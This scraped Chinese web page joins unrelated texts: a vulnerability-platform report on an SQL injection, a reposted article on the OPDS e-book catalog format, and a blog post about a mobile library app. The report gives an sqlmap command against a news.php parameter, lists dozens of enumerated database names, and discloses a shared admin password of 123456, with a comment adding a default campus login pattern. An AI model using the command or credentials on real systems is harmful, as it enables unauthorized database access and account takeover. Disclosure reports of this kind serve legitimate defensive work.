分享漏洞：
披露状态：
： 细节已通知厂商并且等待厂商处理中
： 厂商已经确认，细节仅向厂商公开
： 细节向核心白帽子及相关领域专家公开
： 细节向普通白帽子公开
： 细节向实习白帽子公开
： 细节向公众公开
简要描述：
某处SQL注入
详细说明：
G:\python&python sqlmap/sqlmap.py -u &/loading/news.php?group_id=20&id=805&
漏洞证明：
[*] AlightingService
[*] amfans
[*] android_single
[*] autofan_client
[*] bugtracker
[*] bugtracker_mantis
[*] children
[*] common
[*] corp_news
[*] dooland_client
[*] dsns_blog
[*] dsns_cartoon
[*] dsns_Group
[*] dsns_Photo
[*] dsns_share
[*] dsns_tmp
[*] dsns_user
[*] dudubao
[*] dudubao_ad
[*] dudubao_bak
[*] dudubao_book
[*] dudubao_hd
[*] dudubao_stat
[*] eCatalogService
[*] expand
[*] flipdu
[*] hzaspt
[*] information_schema
[*] instapaper
[*] ipad_sound_book
[*] maglook
[*] maglook_vcart
[*] mantis
[*] newspaper
[*] opds_aldiko
[*] photo_tmp
[*] SearchCon
[*] snsapp
[*] spider
[*] stat_dudubao
[*] testdb
[*] tinyconference
[*] tob_client
[*] tob_client_bak
[*] tob_client_bak_
[*] tob_health
[*] tob_health_admin
[*] tob_health_bak
[*] tob_health_debug
[*] tob_health_hd
[*] tob_health_static
[*] vilady
[*] vip_statistics
[*] weibo_lianxiang
[*] zazhishe
后台统一密码 123456
接着就没有继续往下了
修复方案：
说真的 赶紧给数据库账号分配下权限吧 随便一个子站的注入点 都有全部数据库的浏览权限
这是赤裸裸的叫人赶紧脱裤的节奏啊 毕竟XX万的用户啊 你们要对人家负责啊……
版权声明：转载请注明来源 @
厂商回应：
危害等级：中
漏洞Rank：10
确认时间： 18:13
厂商回复：
最新状态：
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
帮我提交的几个确认下呀
登录后才能发表评论，请先超星移动图书馆有一个登陆的账号
就是你们学校你R040的校园卡卡号'密码1111
已有帐号？
无法登录？
社交帐号登录
明矾爱好者君，已阅读到文档的结尾了呢~~
open publication distributio..
扫扫二维码，随身浏览文档
手机或平板扫扫即可继续访问
关于OPDS端口说明文件
举报该文档为侵权文档。
举报该文档含有违规或不良信息。
反馈该文档无法正常浏览。
举报该文档为重复文档。
推荐理由：
将文档分享至：
分享完整地址
文档地址：
粘贴到BBS或博客
flash地址：
支持嵌入FLASH地址的网站使用
html代码：
&embed src='/DocinViewer-4.swf' width='100%' height='600' type=application/x-shockwave-flash ALLOWFULLSCREEN='true' ALLOWSCRIPTACCESS='always'&&/embed&
450px*300px480px*400px650px*490px
支持嵌入HTML代码的网站使用
您的内容已经提交成功
您所提交的内容需要审核后才能发布，请您等待！
3秒自动关闭窗口[ZT]用于电子书的RSS——OPDS
&&&点击数：104
[作者] 编目精灵III
[单位] 编目精灵III
[摘要] 依Jada指点在Stanza的“共享”中增加了几个资源，从PragPub Magazine中下载了一期杂志，从云中书城下载了一个漫画，才知道一直以为面目可憎的ePub电子书其实也可以有图片并编出漂亮的版式。不过在吾国，添加了Internet Archive也无法连上，可惜了那上面数以百万计的电子书。
在书社会上看到Jada写的这篇日志，觉得值得钻研一番。现征得Jada许可，转贴于此。
依Jada指点在Stanza的“共享”中增加了几个资源，从PragPub Magazine中下载了一期杂志，从云中书城下载了一个漫画，才知道一直以为面目可憎的ePub其实也可以有图片并编出漂亮的版式。不过在吾国，添加了Internet Archive也无法连上，可惜了那上面数以百万计的。
查了下，该由Internet Archive等制订，正是Google图书的竞争对手。
Open Publication Distribution System
用于的RSS——OPDS / by Jada
开放出版发行系统OPDS(Open Publication Distribution System)，是一种用于书目信息发布和订阅的格式，基于atom。它的功能类似于博客订阅中的RSS格式，只不过是专为而设计的。这个以epub格式的为主要格式，也叫OpenPub。2010年5月推出0.9，最新的是今年6月推出的1.1版本。
该的一大是支持各种桌面和移动终端，各种软件，可以让书目信息在不同的终端和阅读软件上显示和分享。读者可以用一款阅读器软件，订阅多个来源书目信息，像RSS订阅一样，实时更新。目前已有著名的Stanza软件支持OPDS。IPAD中文版的Stanza在app store上有下载。对一些不涉及版权等问题的免费，可直接下载到本机阅读，十分方便。
该也提供对书籍借阅方面的支持，如订阅目后，除了浏览书目信息，还可以连接到书目信息提供者，如果是图书馆，可直接借阅。该定义了以下可能的情境：
http://opds-spec.org/acquisition
http://opds-spec.org/acquisition/open-access
http://opds-spec.org/acquisition/borrow
http://opds-spec.org/acquisition/buy
http://opds-spec.org/acquisition/sample
http://opds-spec.org/acquisition/subscribe
这些情景就包括借阅和购买。以下是编码范例：
其中rel 代表这本书来源的状况，而href 则是连结位置，type 则是文档的状态，可以用在让阅读器选择所支持的格式，如：application/epub+zip ，application/pdf ，application/x-mobipocket-ebook。
rel=”http://opds-spec.org/acquisition/buy” 说明这本书是需要购买的，18.99是对书籍价格的描述。关于书的元数据的显示，封面的显示，分页显示等等，也有定义。
OPDS的另一个亮点是支持按主题、日期、流行度等分面浏览。包括以下定义：
http://opds-spec.org/sort/new
http://opds-spec.org/sort/popular
http://opds-spec.org/featured
http://opds-spec.org/crawlable
http: //opds-spec.org/shelf
http://opds-spec.org/subscriptions
目前提供OPDS订阅的在线资源有：
Feedbooks: /catalog.atom
Internet Archive: http://bookserver.archive.org/catalog/
PragPub Magazine | The Pragmatic Bookshelf: /magazines.opds
Revues.org: http://bookserver.revues.org/
Project Gutenberg: http://m.gutenberg.org
Ebooks libres et gratuits: /opds/
Legimi – digital content delivery platform: /opds/root.atom
Shucang: /s/index.php
Plough Publishing: /ploughCatalog_opds.xml
SNDA YZSC: .cn
支持OPDS的软件有：
Infinite Book Reader: – eBook reader for the iPad.
QuickReader: – The Speed Reading eBook Reader for the iPad, iPhone, and iPod Touch.
Aldiko: – EPUB reader and OPDS client for Android
EPUBReader: – All devices and OS supporting Firefox and SeaMonkey Web Browsers
FBReader: – All devices with network access.
Ouiivo Reader: – EPUB reader and OPDS client for iPhone and iPod Touch
MegaReader: – Highly customizable eBook reader for the iPad, iPhone, and iPod Touch with Heads Up Display.
Cool Reader: – Only in Android version.
eBook Search: – Allows you to download free books from OPDS catalogs to iBooks, Kindle, Nook or your favorite iOS eBook reader app. Download for free from iTunes app store.
Mantano Reader’”: ePub and PDF reader for Android.
OPDS生成工具：
Lucicat 在服务器上生成OPDS书目信息。 基于 PHP/MySQL。
http://lucidor.org/lucicat/
对于图书馆来说，可以利用这个，在内容整合上，大有可为啊。
原文连接：
数据库相关文献
论坛相关文献
博主其它文章移动图书馆 - 简书
下载简书移动应用
写了1177字，被9人关注，获得了3个喜欢
移动图书馆
作为上大学还没到图书馆借过书的学生党来说，移动图书馆是秘诀。移动图书馆是一个APP，账号是四个零加校园卡号后六位，密码一般是身份证后六位。
一直对电子书情有独钟因为它充分利用了我的零散时间，不用装书包重，随时想看就看，比纸质书便宜，作为电子商务专业学生，动不动书可以向砖头一样厚，实在是福利。
手机上有关于读书下书买书的APP有掌阅ireader.亚马逊，kindle，当当，历史是在掌阅上花了好几百才发现它是个坑，其实很贵，我还骗自己读书花钱是正经事，数额越大越值得炫耀，现在看来，Too young,too foolish,作为第一个智能机里面默认阅读器是掌阅的人，我也目睹了掌阅的退化，最开始，它还是可以保持良好的新书更新度，然而现在，总是搜索不到想看的书，或者提示你正在购进然后陷入漫漫无期的等待，甚至连最开始可以搜到的《盗墓笔记》由于太贵没买，现在搜索，竟变成了正在购进，还有越来越多的霸道总裁爱上我之类的文，如此不符合我的价值观（0.0),我要勇敢的对你说再见，然而她已经锁定了我几百块钱，然而，有了移动图书馆，这个问题得到了解决，可以把我买的书下载下来导入移动图书馆。
作为没钱买Kindle阅读器的穷逼，对于网传的kindle各种好，我自然只能默默退到一边，然后Kindle App,比掌阅便宜然而界面实在太丑，而且觉得对下载，进入，阅读总有一种微妙的不舒服，读书是个安静而享受的事，还是比较能接受模拟书架的设计，清新一点的风格，然后体会文字的深情，厚重，焕然一新。当当是用来买书的，以前特别迷桐华，独木舟这类的作家的时候会买系列正版书，默默看着封面。爱一本书达到一定地步还是会买。还有中国知网，武汉理工网上图书馆可能也可以找到便宜甚至免费的资源，但是下载再导入而且用电脑还不方便所以让我们拥抱移动图书馆吧。
回到移动图书馆，页面还行，但是并不特别起眼，登录，进入，可以先对电脑文件进行遍历然后导入你想导入你可以导入的pdf，txt等，完成用户转移，然后，是对武汉理工图书馆的搜索，下载，免费阅读，另外查看你已经借阅或者确定你找的书在哪个读书馆还是可以，如果输入书名，没有电子版可以下，他会提示你在某某省图书馆大图书馆有，不止是武汉理工，在线书城有书友上传的资源，另外有热门读书，关键是都是免费的也可以在网上搜索OPDS书源进行添加导入，另外还有视频资源，订阅报纸等功能，还是非常实用，非常典雅。关于书的内容，几乎没有不正经的书，然而有时候也显得有些书没有及时更新，不能下到免费电子版在线看，还是显得不够活泼。
也有大神可以在云盘为盼上找到免费的电子版，然后下载下来慢慢看，找个类似WPS的软件就可以轻松看书了，我看书的经验是，当学习某种技能例如我会输入Html，当想要某种鼓励输入励志类，然后经济物流人物传记，反正想看的书一定要想办法弄到，找找找，下下下，买买买，怀念那种看本书给自己孤独自出空间的感觉，读书让人深情，写作让人深情。有时候会追求便捷触手可及，有时候会为某本书耗尽力气也不可惜。
刚刚看到手机也有手机知网，评价大多是下载一篇五毛还嫌收费贵，想想我花的几百块，好吧，还有尊重版权不让下载等，知网很正规却不亲民。另外还有百度文库用来搜索杂乱的论文相关文章，还有豆丁，多看等。
多读书，多看报，少吃零食多睡觉。
如果觉得我的文章对您有用，请随意打赏。您的支持将鼓励我继续创作！
打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮
被以下专题收入，发现更多相似内容：
这个地方还不知道是否舒适，是否适合我们。不过这里既能写自己的收获体会，也可以看其他PM们对自己工作的看法，也还不赖。
· 49人关注
如果觉得我的文章对您有用，请随意打赏。您的支持将鼓励我继续创作！
选择支付方式：